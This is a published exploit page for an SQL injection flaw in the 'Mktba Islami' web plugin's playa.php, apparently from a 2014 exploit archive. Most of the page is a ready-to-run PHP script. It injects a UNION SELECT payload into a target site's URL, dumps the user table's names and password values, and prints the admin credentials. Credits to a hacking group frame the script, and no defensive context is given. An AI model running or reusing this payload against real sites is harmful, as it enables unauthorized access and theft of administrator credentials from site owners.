facebook facebook twitter rss

Mktba Islami Plugin (playa.php) Sql Injection

Author: Ashter , Published: 05-08-2014
# Exploit Title: Mktba Islami Plugin (playa.php)  Sql Injection 

# Author: Ashter . skype :asshter > fb.com/alshterr

# Software : http://www.mktba.org/

# Tested on: Windows 8.1

# Dork : there isn't dork because sites slami

# Detection date : 2014/7/28

# Exploit


<?
/// Version 4.x - 7.6
if(isset($_POST['sql']) && $_POST['url'] != ""){
echo "<hr> <center>" ;
$url = $_POST['url'];
$ad2 = '/playa.php?catsmktba=1&&row=4%27%20/*!12345UNION*/%20SELECT%201,2,3,group_concat(0x7c6173687465727c,0x40,unhex(hex(name)),0x40,unhex(hex(pass)),0x7c6173687465727c),5,6,7,8,9%20from%20user%20+--+';
$adminmk = @file_get_contents(($url).($ad2));
if($adminmk) {
preg_match("#\|ashter\|(.*?)\|ashter\|#" ,$adminmk,$sec);
$admres = explode("@",$sec[1]);
echo "username : $admres[1]password : $admres[2]<br align=center />";
echo "Friend :Mr.731MY and all members sec4ever.com <br align=center />";

}
}
?>

#
# sec4ever.com ,Exploit4Arab
# Friend :Mr.731MY and all members sec4ever.com

Like us on Facebook :